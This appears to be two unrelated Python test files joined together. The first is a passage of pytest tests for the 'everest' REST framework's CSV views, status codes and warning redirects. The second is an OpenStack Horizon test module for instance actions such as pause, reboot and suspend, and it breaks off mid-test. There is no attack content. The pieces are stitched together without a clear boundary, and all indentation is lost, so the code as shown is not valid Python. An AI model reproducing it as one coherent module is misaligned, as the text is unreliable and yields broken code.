assert len(view_collection) == 2
res = view_app_creator.delete("%s/0" % self.path,
content_type=CsvMime.mime_type_string,
status=200)
assert not res is None
assert len(view_collection) == 1
# Second delete triggers 404.
view_app_creator.delete("%s/0" % self.path,
content_type=CsvMime.mime_type_string,
status=404)
coll_cls = get_collection_class(IMyEntity)
old_remove = coll_cls.__dict__.get('remove')
def remove_with_exception(self): # pylint: disable=W0613
raise RuntimeError()
coll_cls.remove = remove_with_exception
try:
view_app_creator.delete("%s/1" % self.path,
content_type=CsvMime.mime_type_string,
status=500)
finally:
if not old_remove is None:
coll_cls.remove = old_remove
def test_delete_nested_member(self, view_app_creator, view_member):
assert not view_member.parent is None
view_app_creator.delete("%s/0/parent" % self.path,
status=200)
assert view_member.parent is None
def test_delete_terminal(self, view_app_creator, view_member):
assert not view_member.number is None
view_app_creator.delete("%s/0/number" % self.path, status=200)
assert view_member.number is None
class TestViewBasicsMemory(_TestViewBase):
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
def test_post_collection(self, view_app_creator): # pylint:disable=W0621
# This only works in the memory backend because of the referential
# constraint of the parent attribute.
new_id = 0
req_body = b'"id","text","number"\n%d,"abc",2\n' % new_id
res = view_app_creator.post("%s" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=201)
assert not res is None
coll = get_root_collection(IMyEntity)
mb = coll[str(new_id)]
assert mb.text == 'abc'
def test_post_collection_no_id(self,
view_app_creator): # pylint:disable=W0621
# This only works in the memory backend because of the referential
# constraint of the parent attribute.
req_body = b'"text","number"\n"abc",2\n'
res = view_app_creator.post("%s" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=201)
assert not res is None
assert res.headers['Location'].endswith(self.path)
assert native_(res.body).split(os.linesep)[1][:2] != '""'
@pytest.mark.usefixtures('view_collection')
def test_post_nested_collection(self, class_ini,
view_app_creator, view_member): # pylint:disable=W0621
# This only works in the memory backend because it tolerates adding
# the same entity multiple times.
child_coll = get_root_collection(IMyEntityChild)
parent_url = "%s%s/0/" % (class_ini.app_url, self.path)
req_text = '"id","text","parent"\n2,"child2","%s"\n' % parent_url
res = view_app_creator.post("%schildren" % parent_url,
params=bytes_(req_text, encoding='utf-8'),
content_type=CsvMime.mime_type_string,
status=201)
assert not res is None
child_mb = child_coll['2']
assert child_mb.text == 'child2'
assert child_mb.parent.id == view_member.id
@pytest.mark.usefixtures('rdb')
class TestViewBasicsRdb(_TestViewBase):
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app_rdb.ini')
class TestMessagingView(object):
package_name = 'everest.tests.complete_app'
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
app_name = 'complete_app'
path = '/my-entities/'
def test_get_member_default_content_type(self, msg_view_app_creator): #pylint:disable=W0621
coll = get_root_collection(IMyEntity)
ent = MyEntity(id=0)
coll.create_member(ent)
res = msg_view_app_creator.get("%s/0" % self.path, status=200)
assert not res is None
def test_patch_member(self, msg_view_app_creator): #pylint:disable=W0621
coll = get_root_collection(IMyEntity)
ent = MyEntity(id=0)
mb = coll.create_member(ent)
assert mb.__name__ == '0'
req_body = b'"number"\n2\n'
res = msg_view_app_creator.patch("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=200)
assert not res is None
class TestPredicatedView(object):
package_name = 'everest.tests.complete_app'
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
app_name = 'complete_app'
path = '/my-entities'
def test_csv_only(self, pred_view_app_creator): #pylint:disable=W0621
# Without accept header, we get a 404.
pred_view_app_creator.get(self.path, status=404)
pred_view_app_creator.get(self.path,
headers=dict(accept=CSV_MIME), status=200)
class _TestConfiguredViews(object):
views_config_file_name = None
package_name = 'everest.tests.simple_app'
ini_file_path = resource_filename('everest.tests.simple_app',
'simple_app_views.ini')
app_name = 'simple_app'
path = '/foos'
params = ('suffix,expected,end',
[('csv', b'"id"', False),
('json', b'[{"id": 0', False),
('xml', b'</foos>', True)])
@pytest.mark.usefixtures('trv_view_member')
@pytest.mark.parametrize('template,' + params[0],
[('%s.%s',) + args
for args in params[1]] + # pylint: disable=E0602
[('%s/@@%s',) + args
for args in params[1]]) # pylint: disable=E0602
def test_with_suffix(self, trv_app_creator, template,
suffix, expected, end):
res = trv_app_creator.get(template % (self.path, suffix), status=200)
if not end:
assert res.body[:len(expected)] == expected
else:
assert res.body.strip()[-len(expected):] == expected
# Fail for non-existing collection.
trv_app_creator.get('/bars.csv', status=404)
def test_custom_view_with_interface_raises_error(self, app_creator):
with pytest.raises(ValueError):
app_creator.config.add_resource_view(IFoo,
view=lambda context,
request: None)
class TestClassicStyleConfiguredViews(_TestConfiguredViews):
config_file_name = 'everest.tests.simple_app:configure_views_classic.zcml'
def test_default(self, app_creator):
# No default - triggers a 404.
app_creator.get(self.path, status=404)
class TestNewStyleConfiguredViews(_TestConfiguredViews):
config_file_name = 'everest.tests.simple_app:configure_views.zcml'
def test_default(self, app_creator):
# New style views return the default_content_type.
res = app_creator.get(self.path, status=200)
assert res.body.startswith(b'<?xml')
def test_custom_view(self, app_creator):
TXT = b'my custom response body'
def custom_view(context, request): # context unused pylint: disable=W0613
request.response.body = TXT
return request.response
app_creator.config.add_collection_view(IFoo,
view=custom_view, name='custom')
res = app_creator.get('/foos/@@custom')
assert res.body == TXT
def test_invalid_accept_header(self, app_creator):
app_creator.get(self.path,
headers=dict(accept='application/foobar'),
status=406)
def test_star_star_accept_header(self, app_creator):
app_creator.get(self.path,
headers=dict(accept='*/*'),
status=200)
def test_invalid_request_content_type(self, app_creator):
app_creator.config.add_collection_view(IFoo,
request_method=
RequestMethods.POST)
app_creator.post(self.path,
params='foobar',
content_type='application/foobar',
status=415)
@pytest.mark.usefixtures('trv_view_member')
def test_fake_put_view(self, app_creator):
app_creator.config.add_member_view(IFoo,
request_method=
RequestMethods.FAKE_PUT)
req_body = '"id"\n0'
app_creator.post("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
headers={'X-HTTP-Method-Override' :
RequestMethods.PUT},
status=200)
@pytest.mark.usefixtures('trv_view_member')
def test_fake_patch_view(self, app_creator):
app_creator.config.add_member_view(IFoo,
request_method=
RequestMethods.FAKE_PATCH)
req_body = '"id"\n0'
app_creator.post("%s/0" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
headers={'X-HTTP-Method-Override' :
RequestMethods.PATCH},
status=200)
@pytest.mark.usefixtures('trv_view_member')
def test_fake_delete_view(self, app_creator):
app_creator.config.add_member_view(IFoo,
request_method=
RequestMethods.FAKE_DELETE)
app_creator.post("%s/0" % self.path,
headers=
{'X-HTTP-Method-Override' : RequestMethods.DELETE},
status=200)
def test_add_collection_view_with_put_fails(self, app_creator):
with pytest.raises(ValueError) as cm:
app_creator.config.add_collection_view(IFoo,
request_method=
RequestMethods.PUT)
assert str(cm.value).startswith('Autodetection')
def test_add_member_view_with_post_fails(self, app_creator):
with pytest.raises(ValueError) as cm:
app_creator.config.add_member_view(IFoo,
request_method=
RequestMethods.POST)
assert str(cm.value).startswith('Autodetection')
class TestGetCollectionView(object):
package_name = 'everest.tests.simple_app'
config_file_name = 'configure.zcml'
ini_file_path = resource_filename('everest.tests.simple_app',
'simple_app_views.ini')
def test_get_collection_view_with_size(self, class_ini, app_creator):
coll = get_root_collection(IFoo)
path_url = 'http://0.0.0.0:6543/foos/'
req = DummyRequest(application_url=class_ini.app_url,
host_url=class_ini.app_url,
path_url=path_url,
url=path_url + '?size=10',
params=dict(size=10),
registry=app_creator.config.registry,
accept=['*/*'])
req.get_response = lambda exc: None
view = GetCollectionView(coll, req)
res = view()
assert res is not None
assert view.context.slice.start == 0
assert view.context.slice.stop == 10
# Try again with size exceeding the allowed maximum limit (page size).
req.params = dict(size=10000)
req.url = path_url + '?size=10000'
res = view()
assert res is not None
assert view.context.slice.start == 0
assert view.context.slice.stop == FooCollection.max_limit
class TestStaticView(object):
package_name = 'everest.tests.complete_app'
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
app_name = 'complete_app'
def test_access_public_dir(self, static_vw_app_creator):
static_vw_app_creator.get('/public/myentity-collection.csv', status=200)
class TestExceptionView(object):
package_name = 'everest.tests.complete_app'
config_file_name = 'everest.tests.complete_app:configure_no_rdb.zcml'
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
app_name = 'complete_app'
path = '/my-entities'
def test_put_member_raises_error(self, exc_vw_app_creator):
coll = get_root_collection(IMyEntity)
ent = MyEntity(id=0)
coll.create_member(ent)
exc_vw_app_creator.put("%s/0" % self.path,
params='dummy body',
status=500)
def test_post_collection_raises_error(self, exc_vw_app_creator):
req_body = '"id","text","number"\n0,"abc",2\n'
exc_vw_app_creator.post("%s" % self.path,
params=req_body,
content_type=CsvMime.mime_type_string,
status=500)
class _TestWarningViewBase(object):
package_name = 'everest.tests.simple_app'
ini_file_path = resource_filename('everest.tests.simple_app',
'simple_app_views.ini')
app_name = 'simple_app'
path = '/foos'
config_file_name = None
def test_post_collection_empty_body(self, wrn_vw_app_creator):
res = wrn_vw_app_creator.post(self.path, params='',
status=400)
assert res is not None
@pytest.mark.parametrize('path', [path, '/foos?q=id=0'])
def test_post_collection_warning_exception(self, wrn_vw_app_creator, path):
# First POST - get back a 307.
res1 = wrn_vw_app_creator.post(path, params='foo name',
status=307)
body_text = native_(res1.body.rstrip(), encoding='utf-8')
assert body_text.endswith(UserMessagePostCollectionView.message)
assert res1.body.startswith(b'307 Temporary Redirect')
# Second POST to redirection location - get back a 201.
resubmit_location1 = res1.headers['Location']
res2 = wrn_vw_app_creator.post(resubmit_location1,
params='foo name',
status=201)
assert not res2 is None
# Third POST to same redirection location with different warning
# message triggers a 307 again.
old_msg = UserMessagePostCollectionView.message
UserMessagePostCollectionView.message = old_msg[::-1]
try:
res3 = wrn_vw_app_creator.post(resubmit_location1,
params='foo name',
status=307)
assert res3.body.startswith(b'307 Temporary Redirect')
# Fourth POST to new redirection location - get back a 409 (since
# the second POST from above went through).
resubmit_location2 = res3.headers['Location']
res4 = wrn_vw_app_creator.post(resubmit_location2,
params='foo name',
status=409)
assert not res4 is None
finally:
UserMessagePostCollectionView.message = old_msg
def test_put_member_warning_exception(self, wrn_vw_app_creator):
root = get_service()
# Need to start the service manually - no request root has been set
# yet.
root.start()
coll = root['foos']
mb = FooMember(FooEntity(id=0))
coll.add(mb)
transaction.commit()
path = '/'.join((self.path, '0'))
# First PUT - get back a 307.
res1 = wrn_vw_app_creator.put(path,
params='foo name',
status=307)
assert res1.body.startswith(b'307 Temporary Redirect')
# Second PUT to redirection location - get back a 200.
resubmit_location1 = res1.headers['Location']
res2 = wrn_vw_app_creator.put(resubmit_location1, params='foo name',
status=200)
assert not res2 is None
class TestWarningViewMemory(_TestWarningViewBase):
config_file_name = \
'everest.tests.simple_app:configure_messaging_memory.zcml'
@pytest.mark.usefixtures('rdb')
class TestWarningViewRdb(_TestWarningViewBase):
config_file_name = 'everest.tests.simple_app:configure_messaging_rdb.zcml'
class TestWarningWithExceptionView(object):
package_name = 'everest.tests.complete_app'
ini_file_path = resource_filename('everest.tests.complete_app',
'complete_app.ini')
app_name = 'complete_app'
path = '/my-entities'
def test_post_collection_raises_error(self, wrn_with_exc_vw_app_creator):
req_body = '"id","text","number"\n0,"abc",2\n'
wrn_with_exc_vw_app_creator.post("%s" % self.path,
params=req_body,
content_type=
CsvMime.mime_type_string,
status=500)
# pylint: enable=W0621
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from django.core.urlresolvers import reverse # noqa
from django import http
from django.utils.datastructures import SortedDict # noqa
from django.utils.http import urlencode # noqa
from mox import IgnoreArg # noqa
from mox import IsA # noqa
from horizon.workflows import views
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.project.instances import tables
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances import workflows
INDEX_URL = reverse('horizon:project:instances:index')
SEC_GROUP_ROLE_PREFIX = \
workflows.update_instance.INSTANCE_SEC_GROUP_SLUG + "_role_"
class InstanceTests(test.TestCase):
@test.create_stubs({api.nova: ('flavor_list',
'server_list',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_index(self):
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res,
'project/instances/index.html')
instances = res.context['instances_table'].data
self.assertItemsEqual(instances, self.servers.list())
@test.create_stubs({api.nova: ('server_list',
'tenant_absolute_limits',)})
def test_index_server_list_exception(self):
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndRaise(self.exceptions.nova)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/instances/index.html')
self.assertEqual(len(res.context['instances_table'].data), 0)
self.assertMessageCount(res, error=1)
@test.create_stubs({api.nova: ('flavor_list',
'server_list',
'flavor_get',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_index_flavor_list_exception(self):
servers = self.servers.list()
flavors = self.flavors.list()
full_flavors = SortedDict([(f.id, f) for f in flavors])
search_opts = {'marker': None, 'paginate': True}
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([servers, False])
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
for server in servers:
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
AndReturn(full_flavors[server.flavor["id"]])
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/instances/index.html')
instances = res.context['instances_table'].data
self.assertItemsEqual(instances, self.servers.list())
@test.create_stubs({api.nova: ('flavor_list',
'server_list',
'flavor_get',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_index_flavor_get_exception(self):
servers = self.servers.list()
flavors = self.flavors.list()
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
# UUIDs generated using indexes are unlikely to match
# any of existing flavor ids and are guaranteed to be deterministic.
for i, server in enumerate(servers):
server.flavor['id'] = str(uuid.UUID(int=i))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([servers, False])
api.nova.flavor_list(IsA(http.HttpRequest)).AndReturn(flavors)
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
for server in servers:
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
AndRaise(self.exceptions.nova)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
instances = res.context['instances_table'].data
self.assertTemplateUsed(res, 'project/instances/index.html')
self.assertMessageCount(res, error=len(servers))
self.assertItemsEqual(instances, self.servers.list())
@test.create_stubs({api.nova: ('flavor_list',
'server_list',
'tenant_absolute_limits',
'extension_supported',),
api.glance: ('image_list_detailed',),
api.network:
('floating_ip_simple_associate_supported',),
})
def test_index_with_instance_booted_from_volume(self):
volume_server = self.servers.first()
volume_server.image = ""
volume_server.image_name = "(not found)"
servers = self.servers.list()
servers[0] = volume_server
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([servers, False])
api.nova.tenant_absolute_limits(IsA(http.HttpRequest), reserved=True) \
.MultipleTimes().AndReturn(self.limits['absolute'])
api.network.floating_ip_simple_associate_supported(
IsA(http.HttpRequest)).MultipleTimes().AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'project/instances/index.html')
instances = res.context['instances_table'].data
self.assertEqual(len(instances), len(servers))
self.assertContains(res, "(not found)")
@test.create_stubs({api.nova: ('server_list',
'flavor_list',
'server_delete',),
api.glance: ('image_list_detailed',)})
def test_terminate_instance(self):
server = self.servers.first()
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
api.nova.server_delete(IsA(http.HttpRequest), server.id)
self.mox.ReplayAll()
formData = {'action': 'instances__terminate__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_list',
'flavor_list',
'server_delete',),
api.glance: ('image_list_detailed',)})
def test_terminate_instance_exception(self):
server = self.servers.first()
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.flavor_list(IgnoreArg()).AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
api.nova.server_delete(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__terminate__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_pause',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_pause_instance(self):
server = self.servers.first()
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_pause(IsA(http.HttpRequest), server.id)
self.mox.ReplayAll()
formData = {'action': 'instances__pause__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_pause',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_pause_instance_exception(self):
server = self.servers.first()
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_pause(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__pause__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_unpause',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_unpause_instance(self):
server = self.servers.first()
server.status = "PAUSED"
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_unpause(IsA(http.HttpRequest), server.id)
self.mox.ReplayAll()
formData = {'action': 'instances__pause__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_unpause',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_unpause_instance_exception(self):
server = self.servers.first()
server.status = "PAUSED"
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_unpause(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__pause__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_reboot',
'server_list',
'flavor_list',),
api.glance: ('image_list_detailed',)})
def test_reboot_instance(self):
server = self.servers.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_reboot(IsA(http.HttpRequest), server.id,
soft_reboot=False)
self.mox.ReplayAll()
formData = {'action': 'instances__reboot__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_reboot',
'server_list',
'flavor_list',),
api.glance: ('image_list_detailed',)})
def test_reboot_instance_exception(self):
server = self.servers.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_reboot(IsA(http.HttpRequest), server.id,
soft_reboot=False) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__reboot__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_reboot',
'server_list',
'flavor_list',),
api.glance: ('image_list_detailed',)})
def test_soft_reboot_instance(self):
server = self.servers.first()
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_reboot(IsA(http.HttpRequest), server.id,
soft_reboot=True)
self.mox.ReplayAll()
formData = {'action': 'instances__soft_reboot__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_suspend',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_suspend_instance(self):
server = self.servers.first()
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_suspend(IsA(http.HttpRequest), unicode(server.id))
self.mox.ReplayAll()
formData = {'action': 'instances__suspend__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_suspend',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_suspend_instance_exception(self):
server = self.servers.first()
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_suspend(IsA(http.HttpRequest), unicode(server.id)) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__suspend__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_resume',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_resume_instance(self):
server = self.servers.first()
server.status = "SUSPENDED"
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_resume(IsA(http.HttpRequest), unicode(server.id))
self.mox.ReplayAll()
formData = {'action': 'instances__suspend__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ('server_resume',
'server_list',
'flavor_list',
'extension_supported',),
api.glance: ('image_list_detailed',)})
def test_resume_instance_exception(self):
server = self.servers.first()
server.status = "SUSPENDED"
api.nova.extension_supported('AdminActions',
IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(True)
api.nova.flavor_list(IsA(http.HttpRequest)) \
.AndReturn(self.flavors.list())
api.glance.image_list_detailed(IgnoreArg()) \
.AndReturn((self.images.list(), False))
search_opts = {'marker': None, 'paginate': True}
api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
.AndReturn([self.servers.list(), False])
api.nova.server_resume(IsA(http.HttpRequest),
unicode(server.id)) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
formData = {'action': 'instances__suspend__%s' % server.id}
res = self.client.post(INDEX_URL, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ("server_get",
"instance_volumes_list",
"flavor_get"),
api.network: ("server_security_groups",)})
def test_instance_details_volumes(self):
server = self.servers.first()
volumes = [self.volumes.list()[1]]
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.instance_volumes_list(IsA(http.HttpRequest),
server.id).AndReturn(volumes)
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
.AndReturn(self.flavors.first())
api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
.AndReturn(self.security_groups.first())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:detail',
args=[server.id])
res = self.client.get(url)
self.assertItemsEqual(res.context['instance'].volumes, volumes)
@test.create_stubs({api.nova: ("server_get",
"instance_volumes_list",
"flavor_get"),
api.network: ("server_security_groups",)})
def test_instance_details_volume_sorting(self):
server = self.servers.first()
volumes = self.volumes.list()[1:3]
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.instance_volumes_list(IsA(http.HttpRequest),
server.id).AndReturn(volumes)
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
.AndReturn(self.flavors.first())
